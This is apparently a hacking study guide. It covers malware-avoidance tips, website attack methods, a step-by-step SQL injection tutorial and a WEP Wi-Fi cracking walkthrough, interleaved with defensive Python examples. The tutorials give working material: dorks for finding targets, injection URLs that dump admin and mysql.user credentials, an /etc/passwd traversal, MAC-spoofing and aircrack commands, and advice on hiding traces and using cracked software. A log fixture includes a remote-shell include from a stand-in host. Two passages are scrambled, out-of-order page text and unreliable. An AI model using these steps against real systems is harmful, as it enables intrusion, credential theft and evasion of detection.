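    sees still ends in a decoy extension."""
    if true_extension(filename) not in EXECUTABLE_EXTENSIONS:
        return False
    shown = displayed_name(filename)
    return "." in shown and shown.rsplit(".", 1)[1].lower() in DECOY_EXTENSIONS


def flag_attachments(filenames):
    """Return the names that should be treated as disguised executables."""
    return [f for f in filenames if is_disguised_executable(f)]


if __name__ == "__main__":
    for name in SAMPLE_FILES:
        print(f"{_basename(name):28} shown as {displayed_name(name):20} "
              f"disguised={is_disguised_executable(name)}")
```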

How to stop virus or trojan attacks
If you want to know whether your system is infected by viruses and trojans, then these are certain techniques to know that:
1. Your computer might be running slower than normal.
2. Some programs might open without your permission.
3. Various error messages appear on screen when you open something, or even without opening anything.
4. System start up takes too much time.
5. System registry has been disabled or folder options is missing.
6. Most important: the antivirus shows messages of detecting viruses from time to time.
7. While scanning your system with any antivirus or anti-spyware tool, it shows viruses and you notice that the viruses are not being deleted.
...and much more.

Have you ever thought about the reason why your system got infected, what has infected your system, and if it was done by any of your friends, how he has done it? Surely no. Some might know this but for some reason they have ignored it, or in some cases you have tried to find the answer but were not able to get a proper answer. I will tell you all the ways your system can get infected, how you can protect it, and if it's already infected, how you can resolve the problem. So here are a few things about how your system got infected.

How does a System get Infected due to Negligence?
1. Using cracked versions of software, specially security ones like antivirus, anti-spyware etc.
Why I have said this is the first and major cause of infection is because of the following simple reason: all hackers know that the general internet user public always searches for cracked versions of software and wishes to use them for free, and hackers take benefit of that. You will all now be thinking how it helps hackers. We know that almost all antivirus shows each and every keygen as a virus or some trojan, depending upon its type. Now if we all know that, then how come hackers will forget this fact? So what they do is attach trojans and viruses to these files, and at the time when your antivirus shows it as a virus

you ignore the alert and keep the keygen, meaning the trojan, running.
NOTE: And guys, an important note for you all. If your antivirus doesn't show any keygen or crack as a virus, then don't ever think that it's not a virus; it's the most dangerous thing. Why dangerous? Because now the hacker has used some more brain to fool you: he has made the virus undetectable by simply editing the hex code of the original virus.
Now you will all be thinking that if we don't use the cracked versions, then how will we be able to get full versions of the software? Don't worry, when I am there, no fear; drink beer and enjoy everything for free. Its solution will be in the solutions step, just read the article. So what is the moral of the story? Please don't use cracked versions.

2. Downloading things from unknown sites: Most users search for things over the internet, and wherever they find their desired result, meaning the file that they want, they start downloading it from that site only. Now how does it affect your system? Suppose you want to download a wallpaper, say Katrina Kaif. Now hackers know the fact that Katrina has a huge fan following and users will surely download it. Then what they do is simply bind their malicious code with some of the files, and when users download it, their system is infected, and they can never imagine that the virus has come from the wallpaper they downloaded from an unknown site. Now if you are using a good antivirus, your antivirus will pop up warning and alert messages, and sometimes you ignore them, which means your system is also infected. For its solution read on.

3. Pen drive or USB drive: The biggest cause of infection of your system is USB drives and external hard disks. Now how does a virus enter your system using USB drives? You have connected your USB drive to your friend's computer and by chance (sorry, it's for sure, i.e. 100%) your friend's system is infected by a virus or Trojan, and it's the property of a virus that it replicates itself using memory. So when you connect your USB to your friend's computer, your USB is now infected by the virus. Now when you connect this USB to your PC, Windows searches the files on the newly connected device and autoruns the device; for doing this it loads the index of your USB's file system into memory, and now if the USB has a virus, it's the property of the virus that it replicates itself using system memory. For the USB drive virus solution keep reading the article.

4. The most important one: Becoming a Hacker like Me (ROFL but it's the truth). Most internet users are always curious to know ways to hack their friend's email account or his system; for these they download all types of shit from the internet, and believe me, 99.9% of this shit contains viruses and Trojans that send your information to the providers. Why I have mentioned this, you might be clear from the above discussion. Now I don't say stop hacking, but try to follow some basic steps to learn hacking, and first of all you must know how to protect yourself from such types of fake software. For its solution read on.

Now after discussing how your system got infected by your simple negligence, it's time you should know how to fix them and protect your system from all types of viruses and trojans. There are several solutions to them that you will get for absolutely free, and I guarantee that it will protect your system 100% just by doing some little configurations.

HOW TO STOP VIRUS OR TROJANS??
1. Using Good Antivirus: There is a nice misconception among internet users that a full antivirus provides better security. Yes, it's 100% truth, but full antiviruses means paid ones, not the cracked ones.
a. Best Free Antivirus: Avira Personal Antivirus, i.e. Antivir. You can download Avira for free from: http://www.filehippo.com/download_antivir/
Now after downloading the antivirus, what do you have to do to make it as good as the paid antiviruses?
1. Install the antivirus and update it. Note: updating the antivirus regularly is compulsory. Don't worry, it's not your work; it will update itself automatically whenever an update is available.
2. After installing, at the right hand top corner you will see a "CONFIGURATION" button. Just click on it; now a new window will pop up. There at the left hand top you will see a check box in front of which "Expert" is written. Click on that; now you will see several things in it. Now do the following settings one by one:
a. Click on "Scanner", click on all files, set the "Scanner Priority" to high and click on apply.
b. Click on "Guard", click on all files, click on "Scan while reading and writing" and then click apply.
c. Click on "General". Now click on select all and click on apply. In the General tab only, go to the WMI section, click on advanced process protection and then click on apply.
3. After doing that, restart your PC.
4. Now you have made your free antivirus the equivalent of the paid one.
b. Best Free Anti-Spyware: Spyware Terminator with Crawler Web Security Toolbar. Download it for free:

http://www.filehippo.com/download_spyware_terminator/
Install Spyware Terminator with the web security toolbar. Now your following problems are solved:
1. No Trojan can attack you.
2. Protection from malicious websites and much more.

2. Solution for Cracked version Software: As I have mentioned earlier, never download cracks and keygens directly to your system, but several other methods are there. While you are searching for a crack or keygen, first try to search for a serial key; if you found it then it's awesome, and if not, what to do? Go to the website:
Now copy the download link of the keygen or crack into the URL box provided on the website. This website contains all the world famous antiviruses and it will scan the file for you; if it contains any virus just ignore that, otherwise have fun with the crack or keygen.

3. Pen drive or USB drive solution: How you can protect your system from being infected from the pen drive. Just do the following three things; the rest is taken care of by your antivirus.
1. Turn off Auto Play Devices: To do it, go to Start Menu –> RUN –> type gpedit.msc and press enter –> User Configuration –> Administrative Templates –> System –> Turn off Autoplay –> click on enable and then select all drives.
2. Turn off Computer Browser service: To do it, go to Start Menu –> RUN –> type services.msc and press enter –> then find the Computer Browser service, disable it and restart your system.
3. Most important one: Always scan the pen drive or external hard drives after connecting them.

4. Downloading things from Unknown Sites Solution:

The solution to this problem is already provided: the Web Browser Security Toolbar will help you in surfing only secured and genuine websites, and if you want to visit a site and download something, Virus Total will help you identify whether the file is infected or not.

5. Now for a hacker like me, i.e. methods to use or test hack tools. Why I have mentioned this is simply because hackers always take benefit of these noobish tricks: they attach viruses to files and name them as hack tools. So avoid them if you are too curious like me. Then there are several ways to handle it:
1. Install VirtualBox, and on VirtualBox install another Windows and test all hack tools using the virtual Windows. This will protect your system from being infected. Also, it will give you more knowledge about handling viruses and other situations, like what I have to do when something wrong is done.
2. Use Deep Freeze on C drive: For testing hack tools always use Deep Freeze, as after the next restart your system will be at the same position as it was previously.
3. Create two to three fake email IDs and use them for testing keyloggers and other fake email hacking software.
For some more security tips you can also read my previous article.

HACKING WEB SERVER
Hello friends, welcome back to hacking class. Today I will explain all the methods that are being used to hack a website or a website's database. This is the first part of the class "How to hack a website or websites database", and in this I will introduce all website hacking methods. Today I will give you the overview, and in later classes we will discuss them one by one with practical examples. Don't worry, I will also tell you how to protect your websites from these attacks, and other methods like hardening of SQL and hardening of web servers, and key knowledge about CHMOD rights, that is, what thing should be given what rights... Note: This post is for educational purposes only. So guys, get ready for the first part of the Hacking Websites class...

What are the basic things you should know before website hacking?
First of all, everything is optional, as I will start from the very scratch. But you need at least basic knowledge of the following things:
1. Basics of HTML, SQL, PHP and Javascript.
2. Basic knowledge of servers, that is, how servers work.
3. Basic knowledge of Javascript.
4. And most important, expertise in removing traces, otherwise you have to suffer the consequences.
Now the first two things you can learn from a very famous website for the basics of website design, with basics of HTML, SQL, PHP and Javascript: http://www.w3schools.com/
And for the fourth point, that you should be expert in removing traces, you can refer to the first 5 hacking classes and specially read these two:
1. Hiding Yourself from being traced.
2. Removing your Traces.
As we know traces are very important, so please take care of this step. Please don't ignore them, otherwise you can be in big trouble for simply doing nothing.

METHODS OF HACKING WEBSITE:
1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY

1. SQL INJECTION
First of all, what is SQL injection? SQL injection is a type of security exploit or loophole in which an attacker "injects" SQL code through a web form or manipulates URLs based on SQL parameters. It exploits web applications that use client supplied SQL queries. The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
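As an added example (not code from the study guide), here is the "direct insertion" form just described, written as a vulnerable query builder next to a hardened one and run against a constructed in-memory SQLite table; the table names, columns and rows are assumptions for the example.

```python
# Added example, not from the study guide: the "direct insertion" SQL
# injection described above, as a vulnerable query builder next to a
# hardened one. The products/admin tables and their rows are constructed
# for the example and live in an in-memory SQLite database.
import sqlite3


def make_db():
    """Build the constructed sample database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(5, "widget", 9.5), (7, "gadget", 19.0)])
    conn.execute("INSERT INTO admin VALUES ('admin', 'hash-placeholder')")
    return conn


def fetch_product_vulnerable(conn, id_param):
    """The bug: the raw request parameter is pasted into the SQL text, so a
    value such as "7'" breaks the syntax and "5 union all select ..." pulls
    rows from another table into the result."""
    sql = "SELECT id, name, price FROM products WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def query_breaks_vulnerable(conn, id_param):
    """True when the concatenated query fails to parse: the database error
    that reveals the concatenation to anyone who tries a trailing quote."""
    try:
        fetch_product_vulnerable(conn, id_param)
    except sqlite3.OperationalError:
        return True
    return False


def fetch_product_safe(conn, id_param):
    """The fix: validate the parameter as an integer and bind it through a
    placeholder, so user input can never become part of the SQL text.
    Any non-integer value is rejected and yields no rows."""
    try:
        product_id = int(id_param)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id=?", (product_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "5 union all select 1,username,3 from admin"
    print("vulnerable:", fetch_product_vulnerable(db, probe))
    print("safe:      ", fetch_product_safe(db, probe))
```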

2. CROSS SITE SCRIPTING
Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn't intended to do. XSS attacks are very popular, and some of the biggest websites have been affected by them, including the FBI, CNN, Ebay, Apple, Microsoft, and AOL. Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields
Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection. I will explain this in detail in later hacking classes.

3. REMOTE FILE INCLUSION
Remote file inclusion is the most often found vulnerability on websites. Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website, which allows the hacker to execute server side commands as the current logged on user and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system. RFI can lead to the following serious things on a website:
 Code execution on the web server
 Code execution on the client side, such as Javascript, which can lead to other attacks such as cross site scripting (XSS)
 Denial of Service (DoS)
 Data Theft/Manipulation

4. LOCAL FILE INCLUSION
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory traversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFIs. Let's say a hacker found a vulnerable site, www.target-site.com/index.php?p=about; by means of directory traversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p=../../../../../../etc/passwd
I will explain it in detail with practical website examples in later sequential classes on Website Hacking. So keep reading.

5. DDOS ATTACK

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack), simply called a distributed denial of service attack, is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In a DDoS attack we consume the bandwidth and resources of a website and make it unavailable to its legitimate users. For a more detailed hack on DDOS visit:

6. EXPLOITING VULNERABILITY
It's not a new category; it comprises the above five categories, but I mentioned it separately because there are several exploits which cannot be covered in the above five categories. So I will explain them individually with examples. The basic idea behind this is to find the vulnerability in the website and exploit it to get the admin or moderator privileges so that you can manipulate things easily.

SQL INJECTION
Hello friends, in my previous class of How to hack websites, I explained the various topics that we will cover in the hacking classes. If you have missed the previous hacking class, don't worry, read it here. Let's today start with the first topic: Hacking Websites using SQL injection tutorial. Note: This article is for educational purposes only. Please don't misuse it. Isoftdl and I are not responsible for any misuse done by you. So guys, let's start our tutorial of Hacking Websites using the SQL injection technique. First of all, I will provide you a brief introduction about SQL injection. MySQL is a very common database system these days that websites use, and you will be surprised by the fact that it's the most vulnerable database system ever. It has unlimited loopholes and fixing them is a very tedious task.

Hacking Websites using SQL Injection
STEPS TO HACK WEBSITES USING SQL INJECTION
1. Finding the target and vulnerable websites
First of all we must find out our target website. Some Google searches can be awesomely utilized to find out vulnerable websites. I have collected a lot of dorks, i.e. the vulnerability points of the websites. Here we will discuss how to exploit those vulnerabilities manually without any tool. Below are examples of some queries. Open Google and copy paste these queries...
inurl:index.php?id=
inurl:trainers.php?id=

inurl:buy.php?id= inurl:page.php?id= inurl:gallery.php?category= inurl:article.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:newsDetail.php?ID= inurl:play_old.php?id=
Search Google for more Google dorks to hack websites. I cannot put them on my website as they are too critical to discuss. We can discuss them in the comments of this post, so keep posting and reading there.

2. Checking for Vulnerability on the website
Suppose we have a website like this:

h**p://www.site.com/products.php?id=7
To test this URL, we add a quote to it: '
h**p://www.site.com/products.php?id=7'
On executing it, if we get an error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right ... etc." or something like that, that means the target website is vulnerable to SQL injection and you can hack it.

3). Find the number of columns
To find the number of columns we use the statement ORDER BY (it tells the database how to order the result). So how to use it? Well, just increment the number until we get an error.
h**p://www.site.com/products.php?id=5 order by 1/* –> no error
h**p://www.site.com/products.php?id=5 order by 2/* –> no error
h**p://www.site.com/products.php?id=5 order by 3/* –> no error
h**p://www.site.com/products.php?id=5 order by 4/* –> Error (we get a message like "Unknown column '4' in 'order clause'" or something like that)

That means it has 3 columns, because we got an error on 4.

4). Check for UNION function
With union we can select more data in one SQL statement. So we have
h**p://www.site.com/products.php?id=5 union all select 1,2,3/* (we already found above that the number of columns is 3)
If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works.
NOTE: if /* is not working or you get some error, then try --; it's a comment and it's important for our query to work properly.

5). Check for MySQL version
Let's say that we have number 2 on the screen. Now to check for the version we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar. It should look like this:

site. What we need is convert() function i. usr. 6).e.@@version. pass. 4.1.h**p://www. password.1.php?id=5 union all select 1.com/products.3/* and you will get MySQL version . Getting table and column name Well if the MySQL version is less than 5 (i.unhex(hex(@@version)).com/products.convert(@@version using latin1).e 4.site.site. h**p://www.3/* or with hex() and unhex() i.com/products. user_name.33. user.12…) <— later i will describe for MySQL greater than 5 version. we must guess table and column name in most cases. common table names are: user/s. pwd etc… i. passwd. member/s … common column names are: username. admin/s.e. h**p://www. so i must write it .3/* If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …” I didn’t see any paper covering this problem.php?id=5 union all select 1.php?id=5 union all select 1.e would be copyright © 2016 EAPL 53 .

h**p://www.site.com/products.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good)
We know that table admin exists... Now to check column names:
h**p://www.site.com/products.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
We get the username displayed on screen; an example would be admin, or superadmin etc... Now to check if column password exists:
h**p://www.site.com/products.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
We see the password on the screen in hash or plain-text; it depends on how the database is set up, i.e. md5 hash, mysql hash, sha1... Now we must complete the query to look nice. For that we can use the concat() function (it joins strings), i.e.
h**p://www.site.com/products.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a, the hex value for : (so 0x3a is the hex value for colon)

(there is another way for that: char(58), the ASCII value for :)
h**p://www.site.com/products.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get username:password displayed on screen, i.e. admin:admin or admin:somehash. When you have this, you can login like admin or some superuser. If you can't guess the right table name, you can always try mysql.user (default). It has user and password columns, so the example would be
h**p://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

7). MySQL 5
Like I said before, I'm gonna explain how to get table and column names in MySQL greater than 5. For this we need information_schema. It holds all tables and columns in the database. To get tables we use table_name and information_schema.tables, i.e.
h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables, i.e.
h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note that I put 0,1 (get 1 result starting from the 0th). Now to view the second table, we change limit 0,1 to limit 1,1, i.e.
h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
The second table is displayed. For the third table we put limit 2,1, i.e.
h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc... To get the column names the method is the same.

Here we use column_name and information_schema.columns; the method is the same as above, so the example would be
h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is displayed. The second one (we change limit 0,1 to limit 1,1), i.e.
h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
The second column is displayed, so keep incrementing until you get something like username, user, login, pass, passwd etc... If you wanna display the column names for a specific table, use this query (where clause). Let's say that we found table users:
h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we get the column names in table users displayed. Just using LIMIT we can list all columns in table users. Note that this won't work if magic quotes is ON. Let's say that we found columns user, pass and email.
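As an added example (not code from the study guide), here is a small Python detector a site owner can run over web-server access-log lines to spot the probes this class describes: the quote test, ORDER BY and UNION ALL SELECT, information_schema or mysql.user reads from the steps above, plus the ../../etc/passwd request from the local file inclusion section and a URL passed as a file parameter from the remote file inclusion section. The log lines, IP addresses and the host evil.example are constructed for the example.

```python
# Added example, not from the study guide: flag the request patterns this
# class describes in web-server access-log lines (Apache/nginx combined
# format). All log lines, addresses and hostnames below are constructed.
import re
from urllib.parse import unquote_plus

# (rule name, regex applied to the percent-decoded request target)
RULES = [
    ("sqli-quote",   re.compile(r"[?&][^=&]+=[^&]*'")),                # id=7'
    ("sqli-orderby", re.compile(r"\border\s+by\s+\d+", re.I)),          # order by 4/*
    ("sqli-union",   re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),  # union all select
    ("sqli-schema",  re.compile(r"information_schema\.|\bmysql\.user\b", re.I)),
    ("lfi",          re.compile(r"(\.\./){2,}|/etc/passwd", re.I)),    # ../../etc/passwd
    ("rfi",          re.compile(r"[?&][^=&]+=\s*(https?|ftp)://", re.I)),  # p=http://...
]

# ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one normal visitor and two probing clients.
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Mar/2016:10:01:02 +0000] "GET /products.php?id=7 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Mar/2016:10:01:05 +0000] "GET /products.php?id=7%27 HTTP/1.1" 500 211',
    '203.0.113.9 - - [10/Mar/2016:10:01:09 +0000] "GET /products.php?id=5+order+by+4/* HTTP/1.1" 500 211',
    '203.0.113.9 - - [10/Mar/2016:10:01:14 +0000] "GET /products.php?id=5+union+all+select+1,table_name,3+from+information_schema.tables+limit+0,1/* HTTP/1.1" 200 640',
    '198.51.100.4 - - [10/Mar/2016:10:02:00 +0000] "GET /index.php?p=../../../../etc/passwd HTTP/1.1" 200 1320',
    '198.51.100.4 - - [10/Mar/2016:10:02:03 +0000] "GET /index.php?p=http://evil.example/shell.txt HTTP/1.1" 200 88',
    '192.0.2.77 - - [10/Mar/2016:10:03:00 +0000] "GET /index.php?p=about HTTP/1.1" 200 2048',
]


def decode_target(target):
    """Decode percent-encoding twice so double-encoded probes (%2527) also match."""
    return unquote_plus(unquote_plus(target))


def classify(target):
    """Return the names of every rule the request target matches."""
    decoded = decode_target(target)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(lines):
    """Return (client ip, matched rule names, raw target) per suspicious request.
    Lines that do not parse as combined log format are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        names = classify(m.group("target"))
        if names:
            hits.append((m.group("ip"), names, m.group("target")))
    return hits


def offenders(hits):
    """Count suspicious requests per client address, most active first."""
    counts = {}
    for ip, _names, _target in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, names, target in found:
        print(f"{ip:14} {','.join(names):24} {target}")
    print("per client:", offenders(found))
```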

Now to complete the query and put them all together. For that we use concat(); I described it earlier, i.e.
h**p://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*
What we get here is user:pass:email from table users. Example: admin:hash:whatever@blabla.com
But the passwords are in hash format, so we need to crack the hash. Note that 90% of hashes are crackable but 10% are still there which are unable to be cracked. So don't feel bad if some hash doesn't crack. For cracking the MD5 hash values you can use this:
1) Check the net whether this hash has been cracked before: http://www.md5decrypter.co.uk
2) Crack the password with the help of a site:

milw0rm. SCAN TO GET THE VICTIM Get the victim to attack that is whose password you want to hack or crack.rar Password = OwlsNest STEPS TO HACK WIFI OR WIRELESS PASSWORD 1. To do it so type airmon-ng You will see the name of your wireless card.com/files/13696796…CF_2.10_2b. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt). Now type airmon-ng stop ath0 then type: copyright © 2016 EAPL 59 . Now Enter the Backtrack Linux CD into your CD drive and start it. replace “ath0” with the name of your card.php or http://passcracking.com/cracker/insert. Once its started click on the black box in the lower left corner to load up a “KONSOLE” . Download Backtrack Linux Live CD from here: CLICK HERE 2. (mine is named “ath0”) From here on out.com/index.php 3) Use a MD5 cracking software: Download: http://rapidshare.http://www. Now you should start your Wifi card. Get the Backtrack-Linux CD.

ifconfig wifi0 down
then type:
macchanger –mac 00:11:22:33:44:55 wifi0
then type:
airmon-ng start wifi0
The above steps I have explained are to spoof yourself from being traced. In the above step we are spoofing our MAC address; this will keep us undiscovered. Now type:
airodump-ng ath0
All the above steps in one screenshot: [screenshot not included in this extraction]

Now you will see a list of wireless networks in the Konsole. Some will have a better signal than others, and it is always a good idea to pick one with the best signal strength; otherwise it will take a huge time to crack the password, or you may not be able to crack it at all. Once you see the network list, select the network you want to crack. To freeze the airodump screen, hold the CTRL key and press C. Now you will see something like this:

3. SELECTING NETWORK FOR HACKING
Now find the network that you want to crack and make sure that the encryption shown for that network is WEP. If it says WPA or any variation of WPA then move on; you can still crack WPA with Backtrack and some other tools, but it is a whole other ball game and you need to master WEP first.

Once you have decided on a network, take note of its channel number and BSSID, as shown in the figure. The BSSID (the access point's MAC address) will look something like this: 00:23:69:bb:2d:0f. The channel number will be under the heading that says "CH".
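The selection step above (WEP only, strongest signal, note the BSSID and channel) can also be done from the CSV that airodump-ng writes when it is started with -w, instead of reading the screen. The following is an added example and not code from the study guide; the CSV text is constructed for the demo using the column layout airodump-ng writes, the interface name ath0 and the file prefix Ben follow the text, and the helper that builds the capture command for step 4 is mine.

```python
# Added example, not part of the study guide: choose the WEP network with
# the strongest signal from an airodump-ng CSV and build the matching
# airodump-ng capture command. SAMPLE_CSV is constructed for the demo;
# the header line is the one airodump-ng writes with -w.
import csv

SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:23:69:BB:2D:0F, 2016-03-01 10:00:01, 2016-03-01 10:04:50,  6,  54, WEP , WEP, OPN, -41,  120,  5310,   0.  0.  0.  0,   7, HomeNet, 
00:1D:7E:11:22:33, 2016-03-01 10:00:02, 2016-03-01 10:04:49, 11,  54, WPA2, CCMP, PSK, -35,  200,     0,   0.  0.  0.  0,   6, Office, 
00:0F:66:AA:BB:CC, 2016-03-01 10:00:05, 2016-03-01 10:04:40,  1,  11, WEP , WEP, OPN, -78,   40,   120,   0.  0.  0.  0,   5, Guest, 
00:13:46:DE:AD:00, 2016-03-01 10:00:07, 2016-03-01 10:04:30,  3,  54, WEP , WEP, SKA,  -1,   30,    10,   0.  0.  0.  0,   4, Shop, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

def parse_airodump_csv(text):
    """Return the access-point table of an airodump-ng CSV as a list of dicts.
    The file starts with a blank line; the next blank line ends the AP table
    and starts the Station table, which we do not need here."""
    ap_lines = []
    for line in text.splitlines():
        if not line.strip():
            if ap_lines:
                break
            continue
        ap_lines.append(line)
    reader = csv.reader(ap_lines, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    aps = []
    for fields in reader:
        if len(fields) < len(header):
            continue          # truncated line (airodump writes while you read)
        row = {h: f.strip() for h, f in zip(header, fields)}
        row["channel"] = int(row["channel"])
        row["Power"] = int(row["Power"])
        row["# IV"] = int(row["# IV"])
        aps.append(row)
    return aps

def pick_wep_targets(aps):
    """WEP networks only, strongest signal first. Power is dBm, so the value
    closest to 0 is strongest; -1 means the driver reports no signal level,
    so those sort last."""
    wep = [ap for ap in aps if ap["Privacy"] == "WEP"]
    return sorted(wep, key=lambda ap: ap["Power"] if ap["Power"] != -1 else -999,
                  reverse=True)

def airodump_command(ap, prefix, iface="ath0"):
    """The capture command from step 4 of the guide, filled in for this AP."""
    return ["airodump-ng", "-c", str(ap["channel"]), "-w", prefix,
            "--bssid", ap["BSSID"], iface]

if __name__ == "__main__":
    for ap in pick_wep_targets(parse_airodump_csv(SAMPLE_CSV)):
        print(ap["ESSID"], ap["BSSID"], "ch", ap["channel"], "pwr", ap["Power"])
        print("  ", " ".join(airodump_command(ap, "Ben")))
```

One caveat: an ESSID containing a comma breaks the plain csv split, since airodump-ng does not quote that field; if you see a network with an odd name, check the row by hand.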

Now in the same KONSOLE window type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

The file name can be whatever you want. You don't even put in an extension; just pick a random word that you will remember. I usually make mine "Ben" because I can always remember it (simply because I love Ben 10 :D). This file is where airodump is going to store the packets you receive, to crack later; airodump-ng appends -01 to the name (then -02 on the next run with the same name), so the capture ends up as Ben-01.cap.

Note: If you want to crack more than one network in the same session, you must use a different file name for each one or it won't work. I usually name them ben1, ben2 etc.

Once you have typed in that last command, the airodump screen will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector": a 24-bit value that is sent in the clear at the front of every WEP frame and prepended to the secret key to form the per-frame RC4 key. The IV does not contain characters of the password, but because it is so short and gets reused, collecting enough frames with distinct IVs lets aircrack-ng recover the key statistically. Once you gain a minimum of 5,000 of these IVs you can try to crack the password. It will probably take more than this, but I always start my password crack at 5,000 just in case it is a short key. I've cracked some right at 5,000 and others have taken over 60,000. It depends mainly on the key length (a 64-bit key needs far fewer IVs than a 128-bit key) and on which IVs you happen to capture: the longer the key, the more packets you will need to crack it.

4. CRACKING THE WEP PASSWORD

Now leave this Konsole window up and running and open up a 2nd Konsole window. In this window type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This sends a fake authentication to the router so that it associates your (spoofed) MAC address even though you do not know the password; with WEP and open-system authentication the router does not check the key at this stage. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association successful :-)". If this happens, then good! You are almost there. Now type:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This is the ARP request replay attack. It will generate a bunch of text and then you will see a line where your computer is gathering packets and waiting on ARP and ACK. Don't worry about what these mean; just know that these are your meal tickets. Now you just sit and wait. Sometimes this starts to happen within seconds; sometimes you have to wait up to a few minutes. Just be patient. Once your computer finally captures an ARP request, it replays it to the router over and over, the router rebroadcasts each copy encrypted with a new IV, and you will see hundreds of ARP and ACK per second. When it finally does happen, switch back to your first Konsole window and you should see the number underneath IV starting to rise rapidly. This is great! It means you are almost finished!

When this number reaches AT LEAST 5,000 you can start your password crack. Now you need to open up a 3rd and final Konsole window. This is where we actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the file name you made up earlier? Mine was "Ben". Don't put a space between it and -01.cap; type it as you see it, so for me I would type Ben-01.cap. Once you have done this you will see aircrack fire up and begin to crack the password.

Typically you have to wait for more like 10,000 to 20,000 IVs before it will crack. If this is the case, aircrack will test what you've got so far and then say something like "not enough IVs, retry at 10,000". DON'T DO ANYTHING! It will stay running; it is just letting you know that it is on pause until more IVs are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say the same for 15,000, and so on until it finally gets it. If you do everything correctly up to this point, before too long you will have the password!

Take note that aircrack always displays the key as hex bytes separated by colons, and when every byte is a printable character it also shows the ASCII form next to it. So for instance if the password was "secret", it would be displayed as:

73:65:63:72:65:74 (ASCII: secret)

